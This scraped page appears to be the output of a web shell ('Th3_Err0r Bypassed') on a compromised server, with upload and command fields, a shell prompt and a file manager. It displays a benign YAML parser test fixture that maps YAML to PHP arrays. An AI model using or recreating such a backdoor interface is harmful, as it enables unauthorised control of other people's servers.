[ Th3_Err0r Bypassed ]




Upload:

Command:

liwaavux@216.73.217.154: ~ $
---
test: One Element Mapping
brief: |
    A mapping with one key/value pair
yaml: |
    foo: bar
php: |
    array('foo' => 'bar')
---
test: Multi Element Mapping
brief: |
    More than one key/value pair
yaml: |
    red: baron
    white: walls
    blue: berries
php: |
    array(
     'red' => 'baron',
     'white' => 'walls',
     'blue' => 'berries',
    )
---
test: Values aligned
brief: |
    Often times human editors of documents will align the values even
    though YAML emitters generally don't.
yaml: |
    red:   baron
    white: walls
    blue:  berries
php: |
    array(
     'red' => 'baron',
     'white' => 'walls',
     'blue' => 'berries',
    )
---
test: Colons aligned
brief: |
    Spaces can come before the ': ' key/value separator.
yaml: |
    red   : baron
    white : walls
    blue  : berries
php: |
    array(
     'red' => 'baron',
     'white' => 'walls',
     'blue' => 'berries',
    )

Filemanager

Name Type Size Permission Actions
YtsAnchorAlias.yml File 859 B 0644
YtsBasicTests.yml File 3.74 KB 0644
YtsBlockMapping.yml File 919 B 0644
YtsDocumentSeparator.yml File 1.49 KB 0644
YtsErrorTests.yml File 625 B 0644
YtsFlowCollections.yml File 1.59 KB 0644
YtsFoldedScalars.yml File 3.87 KB 0644
YtsNullsAndEmpties.yml File 683 B 0644
YtsSpecificationExamples.yml File 40.55 KB 0644
YtsTypeTransfers.yml File 6.72 KB 0644
embededPhp.yml File 31 B 0644
escapedCharacters.yml File 1.99 KB 0644
index.yml File 312 B 0644
sfComments.yml File 1.33 KB 0644
sfCompact.yml File 2.83 KB 0644
sfMergeKey.yml File 1.07 KB 0644
sfObjects.yml File 284 B 0644
sfQuotes.yml File 741 B 0644
sfTests.yml File 2.24 KB 0644
unindentedCollections.yml File 1.29 KB 0644